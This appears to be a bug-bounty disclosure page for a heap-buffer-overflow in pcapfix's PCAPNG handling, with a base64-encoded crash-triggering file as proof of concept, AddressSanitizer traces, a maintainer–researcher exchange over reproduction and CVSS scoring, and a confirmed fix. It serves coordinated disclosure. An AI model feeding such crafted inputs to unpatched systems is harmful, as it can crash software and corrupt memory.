Heap-based Buffer Overflow in rup0rt/pcapfix

Valid

Reported on

Jun 6th 2021


✍️ Description

Whilst testing pcapfix built from commit 5c2965 with Clang 13 (+ASan) on Ubuntu 20.04.2 LTS, we discovered a PCAPNG file which triggers a heap-buffer-overflow during a memcpy operation.

🕵️‍♂️ Proof of Concept

echo "Cg0NCgAAAADT1MOysvgUAAAAAEpaggAAoPWPsvgUAAAAAAAAAAAA" | base64 -d > /tmp/fuzz.pcap && ./pcapfix -s -v /tmp/fuzz.pcap

The above POC produces this output including Address Sanitizer stack trace:

[*] Reading from file: /tmp/fuzz.pcap
[*] Writing to file: fixed_fuzz.pcap
[*] File size: 39 bytes.
[+] This is a PCAPNG file.
[*] FOUND: Section Header Block at position 0 (0 bytes)
[-] Unknown Byte Order Magic: 0xb2c3d4d3 ==> CORRECTED.
[-] Major version number: 63666 ==> CORRECTED.
[-] Minor version number: 20 ==> CORRECTED.
[*] Section length: 143324300181504 ==> SETTING TO -1
[*] Block size adjusted (0 --> 28).
=================================================================
==2393459==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000051 at pc 0x0000004334b4 bp 0x7ffe43f9a430 sp 0x7ffe43f99bf0
READ of size 28 at 0x602000000051 thread T0
    #0 0x4334b3 in __interceptor_memcpy (/root/pcapfix/pcapfix+0x4334b3)
    #1 0x4dfb9d in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34:10
    #2 0x4dfb9d in fix_pcapng /root/pcapfix/pcapng.c:1361:7
    #3 0x4c9eec in main /root/pcapfix/pcapfix.c
    #4 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x41c58d in _start (/root/pcapfix/pcapfix+0x41c58d)

0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051)
allocated by thread T0 here:
    #0 0x497acd in __interceptor_malloc (/root/pcapfix/pcapfix+0x497acd)
    #1 0x4d829e in fix_pcapng /root/pcapfix/pcapng.c:210:17
    #2 0x4c9eec in main /root/pcapfix/pcapfix.c
    #3 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x4334b3) in __interceptor_memcpy

💥 Impact

This vulnerability is capable of crashing the software, causing memory corruption, and any other unintended consequences of reading past the end of the buffer.

Occurrences

Jamie Slome
a year ago

Admin


I have contacted the maintainer via a GitHub Issue and will await a response from them.

Robert Krause
a year ago

Maintainer


I cannot reproduce this crash on Debian 11/unstable.

[] Reading from file: fuzz.pcap [] Writing to file: fixed_fuzz.pcap [] File size: 39 bytes. [+] This is a PCAPNG file. [] FOUND: Section Header Block at position 0 (0 bytes) [-] Unknown Byte Order Magic: 0xb2c3d4d3 ==> CORRECTED. [-] Major version number: 63666 ==> CORRECTED. [-] Minor version number: 20 ==> CORRECTED. [] Section length: 143324300181504 ==> SETTING TO -1 [] Block size adjusted (0 --> 28). [-] Did not hit the end of the block! (-28 bytes left) [-] Block size mismatch (0xb28ff5a0 != 0x00000000) ==> CORRECTED. [] Trying to align next block... [-] Found 11 bytes of unknown data ==> SKIPPING. [] No more valid blocks found inside file! (maybe it was the last one) [+] SUCCESS: 6 Corruption(s) fixed!

Also I do not understand why this crashes. Writebuffer is 1M: writebuffer = malloc(1024000); And it wants to write 28 bytes (block_pos) as you can see in your output. And it checks the size before memcpy: if (writepos + block_pos > 1024000) { [...] Please help me understand the cause of the crash.

Additionally I do not agree on high severity ;) There is no chance you reach this score on CVSS3 with reasonable assumptions.

geeknik
a year ago

Researcher


git log | head
commit 5c2965f84a90efd3fd724dc6d40d895115abf103

CC=clang-13 CFLAGS="-fsanitize=address" make

echo "Cg0NCgAAAADT1MOysvgUAAAAAEpaggAAoPWPsvgUAAAAAAAAAAAA" | base64 -d > /tmp/fuzz.pcap

./pcapfix -s -v /tmp/fuzz.pcap

==2551156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000051 at pc 0x0000004334b4 bp 0x7ffe908c34b0 sp 0x7ffe908c2c70
READ of size 28 at 0x602000000051 thread T0
    #0 0x4334b3 in __interceptor_memcpy (/root/pcapfix/pcapfix+0x4334b3)
    #1 0x4dfb9d in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34:10
    #2 0x4dfb9d in fix_pcapng /root/pcapfix/pcapng.c:1361:7
    #3 0x4c9eec in main /root/pcapfix/pcapfix.c
    #4 0x7f469f2110b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x41c58d in _start (/root/pcapfix/pcapfix+0x41c58d)

0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051)
allocated by thread T0 here:
    #0 0x497acd in __interceptor_malloc (/root/pcapfix/pcapfix+0x497acd)
    #1 0x4d829e in fix_pcapng /root/pcapfix/pcapng.c:210:17
    #2 0x4c9eec in main /root/pcapfix/pcapfix.c
    #3 0x7f469f2110b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x4334b3) in __interceptor_memcpy
geeknik
a year ago

Researcher


I find 7.8 to be reasonable as far as a severity goes for a local heap-buffer-overflow, but I'm open to changing the severity once the root cause is discovered.

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Robert Krause
a year ago

Maintainer


According to CVSS definitions scope is unchanged and complexity is high. Results in 6.7. I still cannot reproduce this crash, but I am going add more boundary checks to the pcapng routines.

Robert Krause
a year ago

Maintainer


I added additional header checks. Can you please check latest devel branch commit (fb723c83) whether this crash still happens?

geeknik
a year ago

Researcher


This crash is fixed by commit fb723c83. I will ask Jamie to update the CVSS from 7.8 to 6.7.

Jamie Slome
a year ago

Admin


No worries, can you suggest the new vector string for the CVSS, so that I can update it in our database?

geeknik
a year ago

Researcher


I believe this is a more accurate score: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Jamie Slome
a year ago

Admin


Sorted!

Robert Krause validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Robert Krause confirmed that a fix has been merged on fb723c a year ago
Robert Krause has been awarded the fix bounty
to join this conversation